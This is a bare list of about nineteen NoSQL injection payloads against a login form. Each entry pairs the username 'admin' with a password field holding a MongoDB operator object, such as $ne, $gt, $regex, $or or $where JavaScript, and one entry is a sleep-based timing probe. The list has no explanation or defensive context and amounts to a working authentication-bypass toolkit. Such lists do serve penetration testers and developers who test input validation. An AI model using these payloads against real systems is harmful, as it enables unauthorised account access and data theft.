Username: admin
Password: {"$gt": ""} 

Username: admin
Password: {"$ne": null} 

Username: admin
Password: {"$regex": ".*"} 

Username: admin
Password: {"$where": "return true;"} 

Username: admin
Password: {"$where": "this.password.length > 0"} 

Username: admin
Password: {"$where": "this.username == 'admin' && this.password != null"} 

Username: admin
Password: {"$ne": 1} 

Username: admin
Password: {"$exists": true} 

Username: admin
Password: {"$not": {"$eq": null}} 

Username: admin
Password: {"$or": [{}, {"$ne": null}]} 

Username: admin
Password: {"$or": [{"username": "admin"}, {"password": {"$ne": null}}]} 

Username: admin
Password: {"$or": [{"username": "admin"}, {"$where": "1==1"}]} 

Username: admin
Password: {"$where": "Object.bsonsize(this) > 0"} 

Username: admin
Password: {"$where": "sleep(5000)"} 

Username: admin
Password: {"$where": "this.username == 'admin' && this.password == 'password' || 1==1"} 

Username: admin
Password: {"$where": "this.username == 'admin' && this.password == 'password' || '1'=='1'"} 

Username: admin
Password: {"$where": "this.username == 'admin' && this.password == 'password' || this.username != 'admin'"} 

Username: admin
Password: {"$where": "this.username == 'admin' && this.password == 'password' || this.password != 'password'"} 

Username: admin
Password: {"$where": "this.username == 'admin' && this.password == 'password' || this.username == 'admin' && this.password != 'password'"}